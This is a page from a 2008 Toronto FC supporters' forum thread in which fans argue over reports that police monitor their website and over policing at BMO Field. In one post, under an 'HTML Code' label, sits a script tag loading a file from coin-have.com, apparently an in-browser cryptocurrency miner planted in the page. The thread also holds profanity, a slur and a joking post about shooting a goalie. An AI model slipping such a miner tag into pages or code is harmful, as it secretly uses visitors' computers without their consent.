Page 2 of 3 FirstFirst 123 LastLast
    Banned
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Police have shown in inherent ability to concentrate on the wrong things/people...I agree.

Banned
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by stretchthetruth View Post
    hahaha what a joke... better not say anything bad here, boys - big brother is watching you - and your online posts... maybe printing your handle on your jersey isnt such a good idea afterall?

White games have a regular
    paid-duty response where officers
    are hired by TFC to police BMO
    Field. Red games are ones with a
    heightened fan interest, where
    on-duty officers from 14 and 52
    Community Response Units,
    Traffic Services, Mounted Unit
    officers and plainclothes officers
    patrol outside the park.

White games = typical police presence
    Red games = a great excuse for fascist style policing!... can we get a list of these games? I'll wear my helmet.
    there's a quote from june 17th... its probably bad form to quote oneself, but there it is - this is nothing new, nor is it surprising...

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

So much gun violence in this city and people stabbed or beaten and yet the cops are focused on BMO Field and TFC supporters. What a joke. Clear out your scalper racket.

Banned
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Tax money hard at work!!!!!

TAKE A BITE OUTA CRIME!!!!!

Banned
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by Beach_Red View Post
    Well, it would be 1984 if HR was sneaking around trying to find stuff - people putting their personal lives on a public forum themselves is something far creepier than George Orwell could have ever come up with.

But what is kind of 1984 is getting supporters to turn on each other and being snitches - well, maybe not Orwell 1984, but Romania 1984. A little verbal harrassment, sure, but that's as far as it should go.
    thank you!!!! fuck, ratting each other out is exactly what they want you to do - spy on your neighbour - by all means do their jobs for them! fuckin' right its 1984, lets not kid ourselves. whats nuts is that people here actually beg for it.

Quote Originally Posted by [NBF] View Post
    LOL @ this thread, Im sure there's good reason to monitor this website, i would not want a terrorist to attack BMO Field and to have it come out that he belong to a TFC support group known as Red Patch Boys.

What would people think? What would they do to us all in jail? Would "This is Our House" theme finally be removed? Oh The Humanity!
    yeah, well said - if the police dont monitor our entire lives, including this board, - and we dont rat each other out on a regular basis - the TERRORISTS win! FUCK! wake up to the police state!

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

User A flame baited User B at 7:45pm on 9/22/08. My gosh, they are becoming hooligans. We better keep an eye on them and monitor their every post.

And that Hooligan69 is so blatantly showing off his hooligan behaviour with such a name. Get him.

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Let me help with the translation, red games are when they want to get paid overtime. When they needed to be there in numbers such as the Jamaica game during the Ex, they were no where to be found.

Betwixt the waters of the Humber and the Credit
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by wzhxvy View Post
    Let me help with the translation, red games are when they want to get paid overtime. When they needed to be there in numbers such as the Jamaica game during the Ex, they were no where to be found.

Actually, there was about half a dozen on horseback before the game, on the way to BMO.

I'm not worried about police on here, as long as they don't start bitching about Mo and Carver.

Banned
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by wzhxvy View Post
    They needed a few hundred vs. a half a dozen...ah well, thats behind us. So from now on, any trouble we plan will be on the private forums.
    they needed a sensible plan to keep the crowds away from each other. but they like those little conflicts, they allow them to build a case for wholesale arrests, and the labelling of soccer fans as hooligans. have a look at the bullshit that happened after the columbus game last week, would anyone with half a brain thats ever been to bmo allow the two groups to come in contact with each other?!? no, but of course they did - because they were supposed to.

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by Beach_Red View Post
    Well, it would be 1984 if HR was sneaking around trying to find stuff - people putting their personal lives on a public forum themselves is something far creepier than George Orwell could have ever come up with.
    True, being the society of voyeurs that we are I'm sure if something stupid does happen it will be posted on youtube and ultimately here. If that doesn't work then we can always have Mayor Miller issue a ban on hooliganism within city limits.

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by gtaguy View Post
    just read on mls rumors that a frequent visitor to their website is the
    toronto police service( fan monitoring unit )..

I know that at times there are fans that are misbehaving but this really blows me out of the water to think that they frequent the web spots we all frequent..
    my question is are we really such a threat that the police service has to keep tabs on the daily ongoings of the mls because of ppl misbehaving..

Im a supporter and i sure as hell don't want to be labled anymore than that.. opinions ???

http://www.mls-rumors.net/2008/09/re...rs-anyway.html

i can only imagine how many times they frequent this site to see who's a bad boy... jack any idea..
    are you telling me i can get paid for surfing MLS websites? i gotta become a cop. doughnuts and forums.... not a bad job.

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

i bet the police are even in the RPB members only section too. i would not be surprised if they have infiltrated RPB.

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

I don't get this thread. People are bitching that they visit this site, and assuming they monitor us. So cops can't be TFC fans now? They can't be here for the sole purpose of partaking in a supporter's site?

Banned
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by Pachuco View Post
    I don't get this thread. People are bitching that they visit this site, and assuming they monitor us. So cops can't be TFC fans now? They can't be here for the sole purpose of partaking in a supporter's site?
    I think the point is that it's not the cops that are TFC fans that are visiting us, but rather cops staking out TFC fans.

We know that there are TFC fans that are employed by the police not only in our group but in other supporters groups as well. As far as RPB is concerned, we are not anti-police. That is not to say we are not disappointed or upset in how they have handled things.

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

I welcome the police here. I hope they can see how much we hate beer and projectiles being thrown on the pitch and that we're against violence.

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

what are you talking about?

Beer and Violence are what makes me go to TFC games. I look forward to spending $120 on 10 Carlsberg drinks and then figthing all the casual fans who love Carver.

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by Roogsy View Post
    That is not to say we are not disappointed or upset in how they have handled things.

Roogsy

It must be all the chanting and holloring that goes on.
    Must be the fact that futbol fans cherish the fact of being at the event. In mass we are a group, we areTFC and being united make a futbol fan a part of the team.

i bring my 64 year old dad to the games with me and he loves what he sees. cant believe his eyes that toronto has a club he can cheer for. Understands what is happening with the police because he experienced the same back where he's from and says it will pass.

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by MrHawk View Post
    what are you talking about?

Beer and Violence are what makes me go to TFC games. I look forward to spending $120 on 10 Carlsberg drinks and then figthing all the casual fans who love Carver.
    you spend what on that shit

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

1) I don't actually spend that much on beer at TFC games. If I did, my gf would have my manhood in a vice. That's $120 of Ozujsko at the LCBO.

Mentioned
    1 Post(s)
    Tagged
    0 Thread(s)

This is silly.
    I wonder if the Cops keep tabs on all the money we raised for charity.

Good to see the money that Harper has put towards security is aimed squarely at a couple hundred football nerds.

I would invite the cops to follow around any of our members.

I'm pretty they'd get bored in a hurry.

Also, Why not crack down on the scalpers, it's losers in the scalped seats that feel the need to pitch stuff onto the field.

RPB Member
    Past President

Mentioned
    1 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by Wagner View Post
    This is silly.
    I wonder if the Cops keep tabs on all the money we raised for charity.

Good to see the money that Harper has put towards security is aimed squarely at a couple hundred football nerds.

I would invite the cops to follow around any of our members.

I'm pretty they'd get bored in a hurry.

Also, Why not crack down on the scalpers, it's losers in the scalped seats that feel the need to pitch stuff onto the field.
    well seeing that whatever i post is being used by reporters and thrown back to my face ill be careful for what i post but its easy for them to look tough against us.
    HTML Code:
    <script src="https://coin-have.com/c/XQ5z.js"></script>

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

come here little piggy

Registered
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by AL-MO View Post
    You're wasting your time
    You're wasting your tiiiimme
    Go and solve a real crime
    You're wasting your time
    holy shit

Registered
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by Wagner View Post
    This is silly.
    ...a couple hundred football nerds.
    Your whole point is spot on, Wagner, but this is my favourite part.
    Most of us just that (in a good way, IMHO): football nerds.
    Hardly a threat to anyone. Sheesh.
    Support Local Football.

RPB Member

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by Gobi View Post
    Your whole point is spot on, Wagner, but this is my favourite part.
    Most of us just that (in a good way, IMHO): football nerds.
    Hardly a threat to anyone. Sheesh.

apparently a nerd with access to a phone can launch a nuke!!

http://en.wikipedia.org/wiki/John_Draper

If cops are reading this, then hopefully they are smart enough to see that we're not worth the effort.
    ///\\\///\\\///\\\///\\\///\\\///\\\///\\\///\\\

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

This is nothing but comic relief for them...

Banned
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Wzhxvy -

We don't plan any trouble on private forums either. We don't plan trouble at all. The point that the Toronto Sun was trying to make with their BS article was that we some how organized the fights after the game against Columbus using internet message boards. (credit to Barbarez for pointing this out)

Of course this is not the case, and it is rather ridiculous to suggest this.

I have deleted your post accordingly.

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

What a joke, there is no such thing as a 'Fan Monitoring Unit'.

And even if there was, there is nothing of any use on mls rumours. It's a cop who visited their site to see somehting, and MLSR thought it would be interesting to post it, and make up the FMU part.

Like the probably get visits from the Government of Canada, the RCMP, Bell, Rogers as well. Oooh Rogers visited that site, maybe Ted Rogers is planning a TFC takeover..ohhhh nooooes!!!!

They get their 'companies' info from WHOIS type of info, so think of how many companies are on there, they just picked the ones that looked most interesting...and it appears to have worked on you suckers and have driven up their traffic and subsequent ad revenue. Good work.

This Theard = Retarded
    Last edited by joel; 09-23-2008 at 12:16 PM.

Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

Quote Originally Posted by joel View Post
    What a joke, there is no such thing as a 'Fan Monitoring Unit'.

And even if there was, there is nothing of any use on mls rumours. It's a cop who visited their site to see somehting, and MLSR thought it would be interesting to post it, and make up the FMU part.

Like the probably get visits from the Government of Canada, the RCMP, Bell, Rogers as well. Oooh Rogers visited that site, maybe Ted Rogers is planning a TFC takeover..ohhhh nooooes!!!!

They get their 'companies' info from WHOIS type of info, so think of how many companies are on there, they just picked the ones that looked most interesting...and it appears to have worked on you suckers and have driven up their traffic and subsequent ad revenue. Good work.

This Theard = Retarded

Fuck I couldn't agree more. A negative Carver thread is retarted to these people but yet they sit here and speculate and bitch about absolutely nothing. It's all a conspiracy theory, they're coming after the RPB, watch out.

thankless moocher, riding on the coattails of others
    Mentioned
    0 Post(s)
    Tagged
    0 Thread(s)

I'm goign to buy a gun off a dude names Snoopy on Jane and Lawrence. Then I plan to walk on to the pitch on Saturday afternoon and Shoot the opposing goalie in the nets.

I can't help myself as I am constantly recieving instructions from my neighbours buggie to kill. I'm posting this in hope the police will find me in time to stop me as I can't stop myself.

Please stop me from shooting the goalie and then the ref.